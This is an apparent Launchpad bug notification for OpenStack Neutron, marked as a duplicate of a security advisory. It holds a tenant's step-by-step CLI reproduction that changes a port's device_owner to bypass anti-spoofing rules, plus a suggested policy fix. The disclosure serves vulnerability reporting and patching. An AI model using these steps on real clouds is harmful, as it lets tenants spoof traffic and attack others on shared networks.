*** This bug is a duplicate of bug 1489111 *** https://bugs.launchpad.net/bugs/1489111
Thanks for filing this. This was actually a vulnerability fixed later in bug 1489111. I think the part that was overlooked was that this could be done on shared networks. ** This bug has been marked a duplicate of bug 1489111 [OSSA 2015-018] IP, MAC, and DHCP spoofing rules can by bypassed by changing device_owner (CVE-2015-5240) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1417791 Title: Neutron allows non-admin user to circumvent port security via port- update device_owner Status in neutron: New Status in OpenStack Security Advisory: Won't Fix Bug description: Neutron allows a non-admin tenant to circumvent and spoofing port security by updating the device-owner to 'network:None' and rebooting the instance. How to reproduce: 1. Create a new tenant: `keystone tenant-create --name demo --enable=true` 2. Create a new user in that tenant: `keystone user-create --name demo --tenant $TENANT_ID --pass $PASSWORD --enabled true` 3. Switch to that new user: `export OS_USERNAME=demo; export OS_TENANT_NAME=demo; export OS_PASSWORD=$PASSWORD` 4. Create a keypair: `nova keypair-add demo-key --pub-key ~/.ssh/authorized_keys` 5. Create a security group: `neutron security-group-create demo-secgroup` 6. Add a permit rule to that secuirty group: `neutron security-group-rule-create demo-secgroup --remote-ip-prefix 0.0.0.0/0` 7. Deploy a new instance: `nova boot --flavor m1.tiny --image ubuntu-14.04 --nic net-id=$NETWORK_ID --key-name demo-key --security-groups demo-secgroup --poll demo-instance` 8. Find the instance's neutron port: `neutron port-list` 9. Update neutron port device owner: `neutron port-update $PORT_ID --device_owner network:None` 10. Verify neutron port device owner updated: `neutron port-show $PORT_ID` 11. Reboot instance: `nova reboot $INSTANCE_ID` When the instance comes back up, it will not have anti-spoofing port security rules present and can source traffic from any IP and MAC combination. It doesn't appear like this was intended, in Juno the stock neutron/policy.conf includes: ``` "update_port": "rule:admin_or_owner", "update_port:port_security_enabled": "rule:admin_or_network_owner", ``` But the port owner is permitted to modify the device-owner attribute of the port which allows circumventing the port security. I would recommend protecting the device_owner and device_id port attributes so they can only be modified by an admin user. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1417791/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp